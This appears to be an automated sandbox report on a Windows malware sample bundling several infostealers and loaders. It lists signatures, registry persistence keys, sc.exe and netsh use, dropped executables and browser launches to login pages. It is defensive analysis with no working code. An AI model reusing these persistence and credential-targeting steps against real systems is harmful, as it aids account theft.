Malware Analysis Report

2024-11-13 19:09

Sample ID 231111-1my3aacd86
Target 28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5
SHA256 28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5
Tags
mystic redline smokeloader stealc zgrat taiga up3 backdoor evasion infostealer persistence rat stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5

Threat Level: Known bad

The file 28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5 was found to be: Known bad.

Malicious Activity Summary

mystic redline smokeloader stealc zgrat taiga up3 backdoor evasion infostealer persistence rat stealer trojan

Detect ZGRat V1

Detect Mystic stealer payload

ZGRat

RedLine payload

Mystic

Stealc

SmokeLoader

RedLine

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Executes dropped EXE

Adds Run key to start application

AutoIT Executable

Launches sc.exe

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 21:46

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 21:46

Reported

2023-11-11 21:49

Platform

win10v2004-20231020-en

Max time kernel

3s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe"

Signatures

Detect Mystic stealer payload

Detect ZGRat V1

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe N/A

AutoIT Executable

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe
PID 2128 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe
PID 2128 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe
PID 4784 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe
PID 4784 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe
PID 4784 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe
PID 2464 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe
PID 2464 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe
PID 2464 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe
PID 2384 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe
PID 2384 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe
PID 2384 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe

"C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x178,0x17c,0x180,0x154,0x184,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,16526401488773098777,7359895053744353433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,16526401488773098777,7359895053744353433,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10116745818830123095,5917914900614634392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,10116745818830123095,5917914900614634392,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,14748408987207256869,10661166197367841714,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14748408987207256869,10661166197367841714,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1544,16001354579516277289,3152199704523021557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x80,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,4740845206289145078,16306961817994451394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Pv8082.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Pv8082.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6276 -ip 6276

